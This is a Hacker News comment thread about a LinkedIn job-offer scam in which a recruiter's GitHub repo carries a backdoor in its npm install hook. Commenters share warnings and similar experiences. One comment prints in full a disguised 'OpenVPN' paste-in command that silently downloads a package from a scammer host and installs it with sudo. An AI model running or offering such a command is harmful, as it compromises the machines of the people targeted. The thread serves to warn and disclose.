HN

Need help?
<- Back
A backdoor in a LinkedIn job offer

A backdoor in a LinkedIn job offer

lwhsiao

Comments (155)

  • wxw
    > a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
  • jmward01
    So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
  • abhisek
    Smells like contagious interview campaign by DPRK folks. They have been doing this for a while. Even using IDE settings, Claude hooks for malicious code execution.
  • BobAliceInATree
    > I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.Oh, Microsoft.
  • aykutseker
    This is uncomfortably close to a normal interview task now.Someone sends you a repo, says the install is broken, and asks you to take a look.A lot of developers would run rpm install before thinking twice, especially if they were tired or looking for work.
  • dantodor
    Been through this 3 times in the last 6 months. They're getting better. Very credible LI profiles, code looks OK if you only take a glance... The bell start ringing when they insist you to run locally their sh*t
  • Raed667
    They seem to using the same domain for multiple targets: reddit thread from 3 months ago:https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
  • denysvitali
    I had a similar experience, just by email.https://blog.denv.it/posts/i-was-likely-targeted-by-dprk-in-...It was likely DPKR.
  • elwebmaster
    Why is npm still not blocked by every OS on earth is beyond me. These guys will never learn.
  • theoeiffijr
    Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.Remember to use protection when meeting random people, and putting their junk deep inside your computer!
  • dataviz1000
    I don't have a LinkedIn profile.~50% of jobs listed on who is hiring every month require a LinkedIn profile to submit a job application.In order to find a job, one must bend the knee to LinkedIn first and subjugate themselves to the political (all sides) propaganda on the feed.
  • atum47
    I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
  • CyanLite2
    Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
  • NordStreamYacht
    "Recruiters" are getting sophisticated.I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices."Turns out they were just fishing for inside information on my employer's end customer's applications.
  • clemailacct1
    This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
  • rektomatic
    I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
  • CalChris
    It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
  • ChrisMarshallNY
    > So far nothing has changed and the code is still up.That sucks, but it seems to be par for the course, these days.
  • nubinetwork
    > I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
  • LooseMarmoset
    Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
  • srikanth86
    Oh my goodness! I had this playout as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
  • rektlessness
    It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.Yes, throwaway VPS for interview coding tasks should be the new norm.
  • xvxvx
    I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
  • Yhippa
    > but on a more tired or rushed dayThis has nearly gotten me before, and I got lucky.
  • joebuckwilliams
  • alexandra_au
    I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
  • gyoridavid
    I wonder if an antivirus software would catch this..
  • f055
    I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
  • anon
    undefined
  • mattcasmith
    I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
  • hajdjqkekrqow
    Something similar happened to a friend, repo https://github.com/momonity/cryptoskope/
  • robotnikman
    With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.Stay vigilant out there everyone.
  • binsquare
    Would highly recommend running any repo in an isolated environment like a vm
  • khernandezrt
    It would have been game over for me.
  • h4kunamata
    Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."
  • dyingkneepad
    Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
  • zuzululu
    I'm working 3 remote jobs right now and I can tell you guys to really watch out.Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:- Don't stay loyal to your employers.- Don't stay honest to those don't value it.- Don't stay complacent always innovate.
  • stainablesteel
    the entire internet is just phishing at this point
  • avgDev
    More reasons for me to dislike linked-in. I have an account. I hate it.
  • contingencies
    Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
  • dolebirchwood
    As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):```( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]```Yeah, no. Be careful out there.By the way, here's the scammer's "company website": https://jtwllc.com/Superficially looks legit until you start investigating the finer details.
  • blindriver
    LinkedIn is a cesspool of scams now.They know there's a high degree of fraud and they don't do anything about it. They don't care.I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
  • l0new0lf-G
    Yet another reason to be reluctant to even discuss linkedin job offers
  • yieldcrv
    now imagine if you were like the rest of us and didn’t write a blog post about it